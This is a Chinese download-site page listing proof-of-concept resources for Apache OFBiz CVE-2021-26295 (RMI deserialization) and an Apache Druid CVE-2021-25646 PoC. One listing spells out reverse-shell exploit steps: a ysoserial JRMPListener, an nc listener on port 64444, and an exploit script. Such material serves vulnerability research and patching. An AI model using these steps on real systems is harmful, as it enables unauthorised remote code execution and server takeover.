Advertisement

Apache OFBiz CVE-2021-26295: RMI反序列化漏洞...

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:ZIP

简介:
本篇文章主要介绍了Apache OFBiz中的CVE-2021-26295 RMI反序列化安全漏洞,详细解析了该漏洞的原因、影响及修复方法。 CVE-2021-26295 是 Apache OFBiz 中的一个 rmi 反序列化漏洞的利用证明(POC)。使用该 POC 时需要将 ysoserial.jar 放置在指定目录,并且不能使用较高版本的 Java。

全部评论 (0)

还没有任何评论哟~
客服
客服
客服关闭
  • Apache OFBiz CVE-2021-26295: RMI...
    优质
    本篇文章主要介绍了Apache OFBiz中的CVE-2021-26295 RMI反序列化安全漏洞,详细解析了该漏洞的原因、影响及修复方法。 CVE-2021-26295 是 Apache OFBiz 中的一个 rmi 反序列化漏洞的利用证明(POC)。使用该 POC 时需要将 ysoserial.jar 放置在指定目录,并且不能使用较高版本的 Java。
  • Apache OFBizCVE-2021-26295).md
    优质
    本文章介绍了Apache OFBiz框架中的一个关键安全漏洞(CVE-2021-26295),分析了该漏洞的技术细节及其潜在危害,并提供了相应的修复建议。 CVE-2021-26295 是 Apache OFBiz 中的一个反序列化漏洞。此漏洞可能被攻击者利用来执行恶意代码或获取敏感数据。建议受影响的用户尽快更新到最新版本以修复该问题。
  • CVE-2021-26295: 成功利用CVE-2021-26295进行shell弹攻击
    优质
    本文探讨了CVE-2021-26295漏洞,详细描述了如何通过此安全弱点实现远程代码执行,并成功实施了一次Shell反弹攻击。 CVE-2021-26295 EXP可成功反弹shell 本段落以及工具仅限于技术共享,不能用于非法用途,否则一切后果自行承担。 触发命令执行EXP的方法如下: 1. 在VPS上启动RMI监听端口9999: ``` java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 [要执行的命令] ``` 2. 在VPS上启动nc监听端口64444: ``` nc -lvp 64444 ``` 3. 执行python脚本: ``` python3 cve-2021-26295_exp.py ``` 示例:
  • Apache Druid CVE-2021-25646 PoC.py
    优质
    这段代码是针对Apache Druid中存在的CVE-2021-25646漏洞的PoC(Proof of Concept),旨在帮助安全研究人员验证系统是否受该漏洞影响。 CVE-2021-25646 是 Apache Druid 中的一个漏洞,这里提供了一个关于该漏洞的 PoC(Proof of Concept)代码文件名是 CVE-2021-25646-Apache Druid 漏洞 POC.py。
  • Java RMI检测工具
    优质
    简介:本Java RMI反序列化漏洞检测工具旨在帮助企业安全团队快速识别并修复应用程序中的潜在安全风险,确保系统的稳定性和安全性。 检测Java RMI反序列化漏洞涉及识别在使用远程方法调用(RMI)技术时可能出现的安全问题。这类漏洞通常发生在应用程序接收并处理未经验证的输入数据的过程中,可能导致代码执行等严重安全事件。为了有效防护此类风险,需要对系统进行全面审查和测试,确保所有接收到的数据都经过适当的安全检查与过滤。
  • RMI复现工具.zip
    优质
    本工具为RMI反序列化漏洞复现设计,帮助安全研究人员在受控环境中重现该类漏洞的影响,用于学习和测试目的。含详细使用说明文档。 RMI是REMOTE METHOD INVOCATION的简称,它是J2SE的一部分,允许开发人员创建基于Java的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至通过网络)调用它的方法,并且可以像调用本地Java对象的方法一样调用远程对象的方法。这使得分布在不同JVM中的对象在外观和行为方面都像是本地对象。 本复现工具仅供安全人员研究学习使用,请勿用于非法用途,否则后果自负。
  • Java检测工具V1.2_WebLogic XML检测工具(CVE-2017-10271)
    优质
    Java反序列化漏洞检测工具V1.2专为识别CVE-2017-10271 WebLogic XML反序列化安全风险设计,帮助用户快速、准确地评估系统脆弱性并采取防护措施。 Java反序列化漏洞检查工具V1.2用于检测Weblogic XML反序列化漏洞(CVE-2017-10271)。
  • WebLogic XML检测工具(CVE-2017-10271)
    优质
    简介:本工具专门用于检测Oracle WebLogic Server中存在的一项高危XML反序列化漏洞(CVE-2017-10271),能有效评估系统风险,保障网络安全。 好用的WebLogic XML反序列化漏洞检查工具针对CVE-2017-10271漏洞进行检测,适用于以下版本: - Oracle WebLogic Server 10.3.6.0.0 - Oracle WebLogic Server 12.2.1.1.0 - Oracle WebLogic Server 12.1.3.0.0
  • WebLogic(规避CVE-2019-2725)检测POC.txt
    优质
    本文件为针对WebLogic服务器的安全检测工具,旨在帮助安全专家和管理员识别并避免因CVE-2019-2725漏洞引发的潜在风险。通过执行此POC(概念验证),用户可以有效检验系统是否受到该反序列化漏洞的影响,并采取相应的防护措施以确保WebLogic环境的安全性。 关于WebLogic反序列化漏洞(绕过CVE-2019-2725)的检测POC,目前网上相关资料极少,请谨慎对待。
  • Apache Druid CVE-2021-25646命令执行复现.zip
    优质
    该资料包提供了关于Apache Druid中CVE-2021-25646漏洞的详细信息及其实验环境,帮助安全研究人员与开发人员理解和重现此高危命令执行漏洞。 Apache Druid 命令执行漏洞(CVE-2021-25646)复现学习笔记包括以下四部分内容:1. Apache Druid 命令执行漏洞(CVE-2021-25646)复现.pdf;2. apache-druid-0.20.0-bin.tar.gz;3. dns解析.txt;4. 反弹shell.txt。